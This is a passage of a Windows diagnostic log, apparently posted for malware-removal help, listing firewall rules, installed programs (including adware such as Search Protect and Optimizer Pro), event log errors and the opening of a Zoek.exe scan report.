"{38C8D75E-71C3-436D-9764-B14938B96280}" = dir=out | name=youcam for hp |
"{3F5C459A-5805-499D-93DB-5B3C293EEFFA}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\powerdvd12.exe |
"{42049DB9-B1C7-4A46-815B-9DB83E5DA5F5}" = dir=out | app=%localappdata%\hpconnectedmusic\application\spotify_helper.exe |
"{425AB673-EBD4-4EED-9DC0-DAFBF401507C}" = dir=out | name=ebay |
"{4282FE99-8560-4BC7-9576-5F3ED84E263F}" = dir=in | name=checkpoint.vpn |
"{43EBE30C-8FED-4F6E-82F0-ED1D99C2CE2A}" = dir=in | [email protected]{microsoft.windowsreadinglist_6.3.9654.20349_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} |
"{443527E5-84F7-4E73-AE55-69B8B447C5F2}" = protocol=17 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe |
"{47B0F216-C51B-499C-9025-26F11AA8A80B}" = dir=out | name=youcam for hp |
"{4C6356F2-9E16-4BA9-993C-CEF2542B7AB1}" = dir=out | [email protected]{microsoft.bingfinance_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfinance/resources/brandedapptitle} |
"{4D461DAE-79B8-4253-9F68-61D913054800}" = dir=out | [email protected]{microsoft.bingtravel_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingtravel/resources/brandedapptitle} |
"{4E42AA73-9844-409B-8A00-830520CB7DEC}" = dir=out | [email protected]{browserchoice_6.2.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://browserchoice/resources/displayname} |
"{4EBDE20D-17BC-45B2-BF7D-08F8D610DEFB}" = dir=in | name=skype |
"{50ABFBE3-B61D-4109-94D7-919C53BD40FF}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{518A74BA-CC4D-4FA3-AA90-1C5E82A19C7F}" = dir=in | app=c:\program files (x86)\hewlett-packard\hp support framework\resources\hpwarrantycheck\hpdevicedetection3.exe |
"{51B158FE-C814-4A86-BDE8-588B62AF1BB3}" = dir=in | [email protected]{browserchoice_6.2.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://browserchoice/resources/displayname} |
"{51C327C6-8918-4127-A0DC-B8DAAD1F4F81}" = dir=in | [email protected]{microsoft.windowscommunicationsapps_17.5.9600.20498_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{5352AD95-089C-478F-A43F-DB82A7BA9235}" = dir=in | [email protected]{microsoft.windowscommunicationsapps_17.5.9600.20498_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{548DCF8C-BFF2-4BA4-AA88-FBAF9AC8BCC6}" = dir=in | [email protected]{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{560448D6-095C-4907-B046-AC7F710701A7}" = dir=in | name=sonicwall.mobileconnect |
"{57A7F282-4AE1-44DA-B990-5384036E9D7F}" = protocol=17 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe |
"{59F92CE2-0008-4B9A-80BC-33A9B524E04C}" = dir=in | name=hp connected photo |
"{5C56D1F9-1EC8-4AA9-AE0D-A2ECB37FF632}" = dir=out | [email protected]{microsoft.zunemusic_2.2.902.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/resources/ids_manifest_music_app_name} |
"{5C866FB5-FFF2-403B-ADFD-D269E89B8CD9}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |
"{5F4632C0-D5B1-40C3-B0D9-E3A759C81B9E}" = dir=out | name=sonicwall.mobileconnect |
"{605C132B-2B19-4C54-981D-53BFCBEDFC32}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{63B00897-72DB-45F1-99AD-B3DF4CAD89BE}" = dir=out | name=skype |
"{6760FEDC-ADE9-4863-971E-1E74CC430055}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{6850E657-025E-4C3B-BF49-8E20844028C9}" = dir=in | app=%localappdata%\hpconnectedmusic\application\spotify_helper.exe |
"{7D55176D-AB34-43F1-ABAA-FDCA8F2D4C5B}" = dir=in | name=mcafee® central for hp |
"{7E18E60A-D8DF-45D7-8816-0BD91C456D96}" = dir=out | name=windows_ie_ac_001 |
"{7EA620FB-4E88-4E4A-A8F1-0D6281FDC602}" = dir=out | [email protected]{microsoft.zunevideo_2.2.902.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunevideo/resources/ids_manifest_video_app_name} |
"{804C2C54-7F9E-428D-8DAC-4E443F6E4DA9}" = dir=out | [email protected]{microsoft.bingfoodanddrink_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfoodanddrink/resources/apptitlewithbranding} |
"{89BFC86E-AABF-4413-B512-D78D02987688}" = dir=in | name=mcafee® central for hp |
"{8C55827C-1860-4C68-BEEB-097F1D4C1F40}" = dir=out | [email protected]{microsoft.bingsports_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingsports/resources/brandedapptitle} |
"{8D19A65A-5D96-4FC6-8F93-F9F0DDAC4119}" = dir=out | [email protected]{microsoft.bingmaps_2.1.2922.2139_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingmaps/resources/appdisplayname} |
"{9052F89E-F8DA-43B3-9CDC-2CB4770CF561}" = dir=out | [email protected]{microsoft.bingfoodanddrink_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfoodanddrink/resources/apptitlewithbranding} |
"{92E5034A-D81A-4F23-86C3-362EB02C3E79}" = dir=in | name=hp connected photo |
"{94CCA38F-BCCA-497D-A950-B71F98ED1DC2}" = dir=out | name=getting started with windows 8 |
"{95D470FA-308E-44A4-836C-389B0338E6C2}" = dir=out | [email protected]{microsoft.windowsreadinglist_6.3.9654.20349_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} |
"{965B9657-EF10-4A5A-A2BF-344F77EEC1E1}" = protocol=6 | dir=in | app=c:\users\paulj_000\appdata\roaming\utorrent\utorrent.exe |
"{9B816FCD-D9B0-4605-A40C-8DB610FF783D}" = dir=out | [email protected]{microsoft.xboxlivegames_2.0.139.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxlivegames/resources/34150} |
"{9E3D57FC-7C37-4424-9352-4831E97D029D}" = dir=out | [email protected]{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{A3FC004C-66E0-426F-8AB0-5FD1A99F8C2E}" = dir=out | [email protected]{microsoft.bingmaps_2.1.2922.2139_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingmaps/resources/appdisplayname} |
"{A75A4F28-2AB9-4D47-A3E8-7DF73A114C25}" = dir=out | [email protected]{microsoft.bingweather_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingweather/resources/apptitle} |
"{AAF8246D-2471-45F6-B4BA-4F193DF7F7F7}" = dir=out | name=- games app - |
"{AE0CB2FE-9E42-46F1-95DB-FA2FE65029AF}" = dir=out | app=%localappdata%\hpconnectedmusic\application\hpconnectedmusic.exe |
"{B5877A8E-C7A9-4FC9-A7EF-A32FC3A80BCE}" = dir=out | app=c:\program files (x86)\hpconnectedmusic\hpconnectedmusic.exe |
"{B81B1E83-44D1-4A6E-99FD-BC7DE334EA82}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\movie\powerdvd.exe |
"{C11863FE-F0D1-427C-97F8-7988B03FD509}" = dir=out | name=ebay |
"{C3F520D5-7951-4108-BEF2-7305AAEB5631}" = dir=out | name=mcafee® central for hp |
"{C7511C93-71A2-4569-BDA6-53DD7AC43CF3}" = dir=out | [email protected]{microsoft.windowscommunicationsapps_17.5.9600.20498_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{C9DC35AF-2902-44CD-BD61-BD4F9750C42A}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\kernel\dmr\powerdvd12dmrengine.exe |
"{CACDD868-426B-40D1-8B92-2E895665526E}" = dir=out | name=box |
"{CD766335-7782-41A7-833F-4DE46A7A8CD5}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\powerdvd12agent.exe |
"{CE7A2A65-AED1-44C4-8985-389869249BD1}" = protocol=17 | dir=in | app=c:\users\paulj_000\appdata\roaming\utorrent\utorrent.exe |
"{D077C863-28BA-44CE-BB0A-0B689CC61E0E}" = dir=out | name=hp connected photo |
"{D6980480-941A-4DF6-AB81-3734ECD3D779}" = dir=out | name=junipernetworks.junospulsevpn |
"{DB59588E-ED90-4C47-A7B5-7929DD0C0BD2}" = dir=out | name=checkpoint.vpn |
"{DBE15E05-B0DD-42D2-A2D8-E042CCFD976D}" = dir=out | name=- games app - |
"{DC480B21-73C1-4D60-8FA4-06C23459C014}" = dir=in | name=skype |
"{DE87E625-7D28-482E-BB32-C8C42A9B28F0}" = dir=out | [email protected]{microsoft.bingsports_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingsports/resources/brandedapptitle} |
"{DFE580FC-AEC8-45D5-A3F8-8EC59853AF53}" = dir=out | [email protected]{microsoft.bingnews_3.0.2.261_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingnews/resources/brandedapptitle} |
"{E0C8D765-C908-4BA4-B827-4FA8A2BD413B}" = dir=in | [email protected]{microsoft.windowsreadinglist_6.3.9654.20349_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} |
"{E18854B7-9930-4061-A30F-AD7F2E08B403}" = dir=out | [email protected]{microsoft.bingweather_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingweather/resources/apptitle} |
"{E32DC465-1E3D-4F3B-8596-912D4FEBF242}" = dir=in | name=getting started with windows 8 |
"{EA946911-3913-4C47-BE00-9CAC3A884242}" = dir=out | [email protected]{microsoft.zunemusic_2.2.902.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/resources/ids_manifest_music_app_name} |
"{EC799E33-72BA-42D7-9127-DEFE68F9799D}" = dir=in | name=junipernetworks.junospulsevpn |
"{F0901237-6D74-4D78-AD3D-A05F4BA26F0E}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\powerdvd12ml.exe |
"{F1DF82E8-313C-4D6B-9AA9-70FFD76EE8B2}" = dir=out | name=hp registration |
"{F4AFB1BC-9152-416B-B897-C7B2B3E8198D}" = dir=in | [email protected]{browserchoice_6.2.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://browserchoice/resources/displayname} |
"{F64300AD-D559-4000-BD45-0997BCC8E70A}" = dir=out | name=f5.vpn.client |
"{F6B5734C-8E8D-4A93-BFFB-3E0BCA3D6FE5}" = dir=out | [email protected]{browserchoice_6.2.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://browserchoice/resources/displayname} |
"{F756E5C8-6087-4F16-B7D7-627D0832EAF5}" = dir=out | name=hp connected photo |
"{F77E5446-4378-4E99-8B7A-7061AAAEA193}" = dir=in | name=f5.vpn.client |
"{FA3A0A3A-AE77-4FAB-8737-8AA0DF1D51FB}" = dir=out | [email protected]{microsoft.zunevideo_2.2.902.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunevideo/resources/ids_manifest_video_app_name} |
"{FD18F109-5567-405F-AFF9-581CE23A59C9}" = protocol=6 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe |
"{FEC0D71D-C24B-476F-B170-607A2CC2FFCF}" = dir=in | name=getting started with windows 8 |
"TCP Query User{13DD75FF-00ED-4F6A-B00A-C53027A615AB}C:\users\sarah\appdata\roaming\utorrent\utorrent.exe" = protocol=6 | dir=in | app=c:\users\sarah\appdata\roaming\utorrent\utorrent.exe |
"TCP Query User{8C01C6FE-9B0B-4103-8CF8-63C33F534DFE}C:\program files (x86)\mozilla firefox\plugin-container.exe" = protocol=6 | dir=in | app=c:\program files (x86)\mozilla firefox\plugin-container.exe |
"TCP Query User{FB6A8EAE-AC60-46DC-9DBD-E52C726847A7}C:\users\sarah\appdata\roaming\utorrent\utorrent.exe" = protocol=6 | dir=in | app=c:\users\sarah\appdata\roaming\utorrent\utorrent.exe |
"UDP Query User{3DE1499B-9A56-4483-A8E5-B36F6FEEA1D1}C:\program files (x86)\mozilla firefox\plugin-container.exe" = protocol=17 | dir=in | app=c:\program files (x86)\mozilla firefox\plugin-container.exe |
"UDP Query User{B10965E6-ED4B-4911-AA63-F6B15313CC84}C:\users\sarah\appdata\roaming\utorrent\utorrent.exe" = protocol=17 | dir=in | app=c:\users\sarah\appdata\roaming\utorrent\utorrent.exe |
"UDP Query User{F7D48B79-AD7D-4172-9605-7FD954B09141}C:\users\sarah\appdata\roaming\utorrent\utorrent.exe" = protocol=17 | dir=in | app=c:\users\sarah\appdata\roaming\utorrent\utorrent.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{176E2755-0A17-42C6-88E2-192AB2131278}" = Intel® Trusted Execution Engine
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{23170F69-40C1-2702-0920-000001000000}" = 7-Zip 9.20 (x64 edition)
"{2DE6247C-7077-451B-8BA7-FFD1A2ABBB47}" = Inst5675
"{314FAD12-F785-4471-BCE8-AB506642B9A1}" = HP SimplePass
"{3685B5E8-A0A8-494B-B035-B221547A4B63}" = Intel® Trusted Execution Engine Driver
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6E14E6D6-3175-4E1A-B934-CAB5A86367CD}" = HP Postscript Converter
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{74FE39A0-FB76-47CD-84BA-91E2BBB17EF2}" = DisableMSDefender
"{7A75E042-0D30-43C2-BD2A-684F4BE38FF7}" = HP Utility Center
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{840C85B7-D3D6-4143-9AF9-DAE80FD54CFC}" = Classic Shell
"{878F6913-7421-4713-97F7-0A736EE2A188}" = Inst5676
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{A84A4FB1-D703-48DB-89E0-68B6499D2801}" = Qualcomm Atheros Bluetooth Suite (64)
"{BCCACFE6-91A0-4F32-80A0-ADC0CA048C7B}" = Intel® Trusted Execution Engine
"{D1E8F2D7-7794-4245-B286-87ED86C1893C}" = HP Registration Service
"{E9FA781F-3E80-4399-825A-AD3E11C28C77}" = MSVCRT110_amd64
"MyPC Backup" = MyPC Backup
"Reimage Repair" = Reimage Repair
"SynTPDeinstKey" = Synaptics Pointing Device Driver
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{01FB4998-33C4-4431-85ED-079E3EEFE75D}" = CyberLink YouCam
"{03D562B5-C4E2-4846-A920-33178788BE00}" = Windows Live Communications Platform
"{07FA4960-B038-49EB-891B-9F95930AA544}" = HP Customer Experience Enhancements
"{0F929651-F516-4956-90F2-FFBD2CD5D30E}" = Photo Gallery
"{0FF9CC94-EF23-401E-BDBD-37403D1A2B38}" = Windows Live SOXE Definitions
"{10640F6D-6AB0-401E-9FC6-A94D19C580BC}" = Windows Live UX Platform Language Pack
"{147FBA18-A6BB-4AD5-8F0A-37380AAABD76}" = Photo Common
"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}" = CyberLink Media Suite 10
"{2020C08E-74F5-4E9F-BD2A-41F8CB6EBA10}" = Photo Gallery
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer
"{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}" = CyberLink Power2Go 8
"{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App" = Update Installer for WildTangent Games App
"{30B2D1D8-0A07-4B71-9553-0710C5D31E35}" = HP Wireless Button Driver
"{3C5F91EF-5C0B-4D13-BCBE-0FC6FC3ED7F9}" = Movie Maker
"{45898170-E68C-4F02-AA35-C2186BF347A3}" = Movie Maker
"{5A0EE0F0-E909-4F3B-B437-AAD9252427CB}" = Windows Live Installer
"{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}" = Realtek Card Reader
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{6B6923B9-8719-425B-916C-CD2908F31AAF}" = Windows Live SOXE
"{6F340107-F9AA-47C6-B54C-C3A19F11553F}" = Hewlett-Packard ACLM.NET v1.2.2.3
"{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-hp" = WildTangent Games App (HP Games)
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8E14DDC8-EA60-4E18-B3E3-1937104D5BDA}" = MSVCRT110
"{90150000-0138-0409-0000-0000000FF1CE}" = Microsoft Office
"{936D4074-6A57-45ED-AF5A-F7CF5A56DE6F}" = Windows Live Essentials
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{B46BEA36-0B71-4A4E-AE41-87241643FA0A}" = CyberLink PowerDVD 12
"{C3A32068-8AB1-4327-BB16-BED9C6219DC7}" = Qualcomm Atheros Driver Installation Program
"{C59C179C-668D-49A9-B6EA-0121CCFC1243}" = CyberLink LabelPrint
"{C6B0EE9E-2128-4448-B7AE-5E2B46E0F0E7}" = Windows Live Photo Common
"{C78E8F51-3EAD-4F0C-83F0-EF371075E0B4}" = HP System Event Utility
"{CCE5C597-03EA-423E-BA80-6FCD280A8465}" = HP Documentation
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E3445598-4424-4EE2-B71C-C23325F7FB71}" = Windows Live PIMT Platform
"{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}" = HP Support Assistant
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel® Processor Graphics
"{F0E58739-2B4C-498F-9B0D-FF0F2FD52B61}" = Windows Live UX Platform
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}" = Realtek Ethernet Controller All-In-One Windows Driver
"{FC0ADA4D-8FA5-4452-8AFF-F0A0BAC97EF7}" = Energy Star
"{FD49537C-C3A6-4F8D-93E6-68C778A1E192}" = HP Recovery Manager
"{FE139F4C-CE5B-121A-8A2D-191FA2226094}" = toopbUyEr
"Adobe Flash Player Plugin" = Adobe Flash Player 13 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 12.0
"Avast" = avast! Free Antivirus
"Google Chrome" = Google Chrome
"InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}" = CyberLink YouCam
"InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}" = CyberLink Media Suite 10
"InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}" = CyberLink Power2Go 8
"InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}" = HP SimplePass
"InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}" = CyberLink PowerDVD 12
"InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}" = CyberLink LabelPrint
"Internet Helper Anti-phishing" = Internet Helper Anti-phishing
"Mozilla Firefox 29.0.1 (x86 en-GB)" = Mozilla Firefox 29.0.1 (x86 en-GB)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Optimizer Pro_is1" = Optimizer Pro v3.2
"SearchProtect" = Search Protect
"SoftwareWatcher bundle" = SoftwareWatcher bundle
"StartHPConnectedMusic" = HP Connected Music (Meridian - installer)
"VLC media player" = VLC media player 2.1.3
"WildTangent wildgames Master Uninstall" = WildTangent Games
"WinLiveSuite" = Windows Live Essentials
"WTA-081181af-2cad-4032-a268-7aa2d0863e2d" = Aloha TriPeaks
"WTA-0b40f8aa-1e35-4f3e-8c6b-b4a7f4b089ca" = Zuma's Revenge
"WTA-27490316-75f9-4df1-9947-3a2f97f1af52" = Bejeweled 3
"WTA-2fc67ea2-df5a-4299-9a7c-dcf3a7ed419b" = Ranch Rush 2 - Premium Edition
"WTA-4a9907f0-54f0-486f-ad9d-0e6ebd883723" = Polar Bowler
"WTA-4bdb013b-8d1c-408c-84b4-08eea720b6c3" = Virtual Families
"WTA-50da4b90-5f9c-4fa7-a675-b49cad464406" = Build-a-lot
"WTA-6419fd1c-11d6-48ed-8cee-de613de685bf" = Governor of Poker 2 Premium Edition
"WTA-9fb60bbd-f22f-40cf-bb68-800940833b8b" = Vacation Quest™ - Australia
"WTA-af10fda0-b5ef-4733-b35d-3a8fb481a1a1" = Wedding Dash
"WTA-c73998b4-88b1-4b07-9a3c-6b73a12cf7be" = Trinklit Supreme
"WTA-c79d629f-6454-4cb9-b41c-a9e0b4c8ad47" = Cradle of Rome 2
"WTA-dd3bf450-d40a-4e90-bd99-d710b8338844" = Jewel Match 3
"WTA-e73ccfe0-f9d1-4353-be60-fd3d9c4657d8" = Mahjongg Artifacts
"WTA-edd3433f-125d-4e1c-92d7-a9350a019231" = Crazy Chicken Soccer
"WTA-ee2ab4cf-5fe8-47f5-87c1-1c628e74e89b" = Plants vs. Zombies - Game of the Year
"WTA-fd40de2d-b0bc-4730-a346-8e5df7d314fe" = Farm Frenzy
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Search Protection" = Search Protection
"uTorrent" = µTorrent
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 18/05/2014 13:04:01 | Computer Name = PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 5625
 
Error - 18/05/2014 15:47:28 | Computer Name = PC | Source = Microsoft-Windows-Immersive-Shell | ID = 5973
Description = Activation of application microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1
 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log
 for additional information.
 
Error - 18/05/2014 16:22:27 | Computer Name = PC | Source = Customer Experience Improvement Program | ID = 1008
Description =
 
Error - 20/05/2014 13:05:51 | Computer Name = PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 20/05/2014 13:05:51 | Computer Name = PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 1813
 
Error - 20/05/2014 13:05:51 | Computer Name = PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 1813
 
Error - 20/05/2014 14:34:48 | Computer Name = PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 20/05/2014 14:34:48 | Computer Name = PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 1500
 
Error - 20/05/2014 14:34:48 | Computer Name = PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 1500
 
Error - 20/05/2014 14:34:51 | Computer Name = PC | Source = Customer Experience Improvement Program | ID = 1008
Description =
 
[ System Events ]
Error - 21/05/2014 11:51:38 | Computer Name = PC | Source = Service Control Manager | ID = 7000
Description = The avast! HardwareID service failed to start due to the following
 error:   %%127
 
Error - 21/05/2014 11:51:48 | Computer Name = PC | Source = Service Control Manager | ID = 7000
Description = The avast! HardwareID service failed to start due to the following
 error:   %%127
 
Error - 21/05/2014 11:51:58 | Computer Name = PC | Source = Service Control Manager | ID = 7000
Description = The avast! HardwareID service failed to start due to the following
 error:   %%127
 
Error - 21/05/2014 11:52:08 | Computer Name = PC | Source = Service Control Manager | ID = 7000
Description = The avast! HardwareID service failed to start due to the following
 error:   %%127
 
Error - 21/05/2014 11:52:18 | Computer Name = PC | Source = Service Control Manager | ID = 7000
Description = The avast! HardwareID service failed to start due to the following
 error:   %%127
 
Error - 21/05/2014 11:52:28 | Computer Name = PC | Source = Service Control Manager | ID = 7000
Description = The avast! HardwareID service failed to start due to the following
 error:   %%127
 
Error - 21/05/2014 11:52:39 | Computer Name = PC | Source = Service Control Manager | ID = 7000
Description = The avast! HardwareID service failed to start due to the following
 error:   %%127
 
Error - 21/05/2014 11:52:49 | Computer Name = PC | Source = Service Control Manager | ID = 7000
Description = The avast! HardwareID service failed to start due to the following
 error:   %%127
 
Error - 21/05/2014 11:53:32 | Computer Name = PC | Source = Service Control Manager | ID = 7000
Description = The avast! HardwareID service failed to start due to the following
 error:   %%127
 
Error - 21/05/2014 13:06:32 | Computer Name = PC | Source = Service Control Manager | ID = 7034
Description = The CyberLink PowerDVD 12 Media Server Service service terminated
unexpectedly. It has done this 1 time(s).
 
 
< End of report >
 

 

 

 

 

Zoek.exe v5.0.0.0 Updated 02-June-2014
Tool run by paulj_000 on 05/06/2014 at 17:12:32.11.
Microsoft Windows 8.1 6.3.9600  x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\paulj_000\Downloads\zoek.exe
Script used: C:\Users\paulj_000\Downloads\zoekscript.txt

==== System Restore Info ======================

05/06/2014 17:14:57 Zoek.exe System Restore Point Created Succesfully.

==== Installed Programs ======================

æTorrent  
7-Zip 9.20 (x64 edition)  
Adobe Flash Player 13 Plugin  
Adobe Shockwave Player 12.0  
Aloha TriPeaks  
avast Free Antivirus  
Bejeweled 3  
Bonjour  
Build-a-lot  
Classic Shell  
Cradle of Rome 2  
Crazy Chicken Soccer  
CyberLink LabelPrint  
CyberLink Media Suite 10  
CyberLink Power2Go 8  
CyberLink PowerDVD 12  
CyberLink YouCam  
D3DX10  
DisableMSDefender  
Energy Star  
Farm Frenzy  
Google Chrome  
Google Toolbar for Internet Explorer  
Google Update Helper  
Governor of Poker 2 Premium Edition  
Hewlett-Packard ACLM.NET v1.2.2.3  
HP Connected Music (Meridian - installer)  
HP Customer Experience Enhancements  
HP Documentation  
HP Postscript Converter  
HP Recovery Manager  
HP Registration Service  
HP SimplePass  
HP Support Assistant  
HP System Event Utility  
HP Utility Center  
HP Wireless Button Driver  
Inst5675  
Inst5676  
Intel® Processor Graphics  
Intel® Trusted Execution Engine  
Intel® Trusted Execution Engine Driver  
Internet Helper Anti-phishing  
Jewel Match 3  
Mahjongg Artifacts  
Microsoft Application Error Reporting  
Microsoft Office  
Microsoft SQL Server 2005 Compact Edition [ENU]  
Microsoft Visual C++ 2005 Redistributable  
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17  
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161  
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219  
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219  
Movie Maker  
Mozilla Firefox 29.0.1 (x86 en-GB)  
Mozilla Maintenance Service  
MSVCRT  
MSVCRT110  
MSVCRT110_amd64  
MyPC Backup   
Optimizer Pro v3.2  
Performancer  
Photo Common  
Photo Gallery  
Plants vs. Zombies - Game of the Year  
Polar Bowler  
Qualcomm Atheros Bluetooth Suite (64)  
Qualcomm Atheros Driver Installation Program  
Ranch Rush 2 - Premium Edition  
Realtek Card Reader  
Realtek Ethernet Controller All-In-One Windows Driver  
Realtek High Definition Audio Driver  
Reimage Repair  
Search Protect  
Search Protection  
SoftwareWatcher bundle  
swMSM  
Synaptics Pointing Device Driver  
toopbUyEr  
Trinklit Supreme  
Update Installer for WildTangent Games App  
Vacation QuestT - Australia  
Virtual Families  
VLC media player 2.1.3  
Wedding Dash  
WildTangent Games  
WildTangent Games App (HP Games)  
Windows Live Communications Platform  
Windows Live Essentials  
Windows Live Installer  
Windows Live Photo Common  
Windows Live PIMT Platform  
Windows Live SOXE  
Windows Live SOXE Definitions  
Windows Live UX Platform  
Windows Live UX Platform Language Pack  
Zuma's Revenge  

==== Running Processes ======================

C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
C:\PROGRA~2\SearchProtect\Main\bin\CltMngSvc.exe
C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSMonitorServicePDVD12.exe
